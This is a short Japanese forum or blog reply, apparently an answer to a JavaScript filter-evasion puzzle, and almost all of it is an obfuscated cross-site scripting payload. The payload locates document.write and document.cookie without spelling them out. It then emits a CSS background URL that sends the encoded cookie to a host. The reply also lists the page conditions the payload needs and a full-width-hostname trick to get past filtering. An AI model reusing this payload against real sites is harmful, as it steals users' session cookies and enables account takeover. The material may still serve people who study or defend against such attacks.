回答
http://d.hatena.ne.jp/hoshikuzu/20090616#p3
ちょっとミスってた。長いのでこちらで。
<script> </script><style> body{background:url(http://[0::1]/style)}</style><script> for (writd_ in {writd:0}){} for (writf_ in {writf:0}){} for (cookid_ in {cookid:0}){} for (cookif_ in {cookif:0}){} for (toString_ in {toString:0}){} for (charAt_ in {charAt:0}){} for (length_ in {length:0}){} for (body_ in {documentElement:0}){} for (innerHTML_ in {innerHTML:0}){} for (split_ in {split:0}){} for (style_ in {style:0}){} for (var a in document) if (a >writd_) if (writf_ > a) if (6 >a[length_]) { document[a](document[body_][innerHTML_][split_](style_)[0][charAt_](0)) document[a](style_) document[a](document[body_][innerHTML_][split_](style_)[1]) for (var b in document) if (b >cookid_) if (cookif_ >b) document[a](encodeURI(document[b])) document[a](document[body_][innerHTML_][split_](style_)[2]) document[a](style_) document[a](document[body_][innerHTML_][split_](style_)[3][charAt_](0)) } </script>
前提条件
- head要素のinnerHTMLの先頭が"<"である(先頭にない場合はcharAtの引数を調整)
- style要素が他に存在しない(する場合はsplitの結果の配列のインデクスを調整)
攻撃者とターゲットの両方がIPv6対応NAMEPREPが実装されているブラウザなら全角でホスト名を書けばOK